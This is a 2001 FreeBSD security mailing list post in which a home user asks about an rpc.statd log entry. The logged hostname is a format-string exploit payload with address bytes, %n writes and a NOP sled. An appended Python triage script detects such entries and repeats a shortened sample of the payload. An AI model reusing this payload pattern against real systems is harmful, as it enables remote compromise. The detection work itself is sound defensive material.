Date:      Mon, 4 Jun 2001 01:30:42 -0500 (CDT)
From:      Josh Thomas <jdt2101@ksu.edu>
To:        freebsd-security@freebsd.org
Subject:   rpc.statd attack before ipfw activated
Message-ID:  <Pine.GSO.4.21L.0106040126530.3155-100000@unix1.cc.ksu.edu>
In-Reply-To: <3B1A92C6.8030301@bsd.st>

I didn't set up ipfw for a couple of days in between setting up a small
NFS server for an in-home LAN, and I got this in my system log.  I realize
now that I should have set up ipfw before doing this, but any ideas what
just happened?  Here is the log:
Jun  2 19:36:41 thatguys rpc.statd: invalid hostname to
sm_stat: ^X\xf7\xff\xbf^
X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7\xff\
xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P
Jun  2 19:36:41 thatguys /kernel: PM-^PM-^PM-^P

And it cut off there.  This is a home machine, and yes, I realize that a
firewall should have been running first; however, I didn't have time.  I'm
a relative novice to RPC and NFS in general, so any clues would be
appreciated.  Thanks,

Josh Thomas
Student Systems Analyst
Engineering Computing Center
Kansas State University
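
Added example (not part of the original message): a triage script for the kind of rpc.statd entry shown in the log above. It flags `%n` and width-padded printf directives, and long runs of `M-^P` (how syslogd renders byte 0x90), in the hostname field; the sample lines are constructed and shortened, and the thresholds and finding names are assumptions.

```python
import re

# Constructed sample lines modelled on the log in the message (shortened).
SAMPLE_LOG = [
    r"Jun  2 19:36:41 thatguys rpc.statd: invalid hostname to sm_stat: "
    r"^X\xf7\xff\xbf^Y\xf7\xff\xbf%8x%8x%8x%236x%n%137x%n%10x%n%192x%n" + "M-^P" * 40,
    "Jun  2 19:40:02 thatguys rpc.statd: invalid hostname to sm_stat: fileserver..lan",
    "Jun  2 19:41:10 thatguys sshd[311]: Accepted password for josh from 192.168.1.5",
]

# The hostname rpc.statd rejected is everything after the fixed message text.
STATD = re.compile(r"rpc\.statd(?:\[\d+\])?: invalid hostname to sm_stat: (?P<host>.*)$")
FMT_WRITE = re.compile(r"%(?:\d+\$)?[hl]*n")        # printf store directive (%n, %hn, %1$n)
FMT_PAD = re.compile(r"%\d+[xud]")                  # width-padded conversions such as %236x
NOP_RUN = re.compile(r"(?:M-\^P|\\x90){8,}")        # 8+ consecutive 0x90 bytes as logged
NONPRINT = re.compile(r"\\x[0-9a-f]{2}|M-|\^[@-_]")  # escaped high/control bytes


def classify(line):
    """Return None for non-statd lines, else a list of findings (empty if benign)."""
    m = STATD.search(line)
    if m is None:
        return None
    host = m.group("host")
    findings = []
    if FMT_WRITE.search(host):
        findings.append("format-write")
    if len(FMT_PAD.findall(host)) >= 3:   # assumed threshold
        findings.append("format-padding")
    if NOP_RUN.search(host):
        findings.append("nop-run")
    if NONPRINT.search(host):
        findings.append("non-printable")
    return findings


def scan(lines):
    """Return (line_number, findings) for every rpc.statd line worth triage."""
    hits = []
    for number, line in enumerate(lines, 1):
        findings = classify(line)
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(findings)}")
```

Syslog wraps nothing itself; when scanning an archived copy such as this e-mail, rejoin the wrapped lines into one entry before passing them to `scan`.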
